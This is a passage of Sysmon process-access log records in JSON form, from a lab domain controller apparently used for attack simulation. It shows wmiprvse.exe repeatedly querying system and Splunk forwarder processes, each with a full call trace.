4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5304,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010E05C0400}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5305,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program 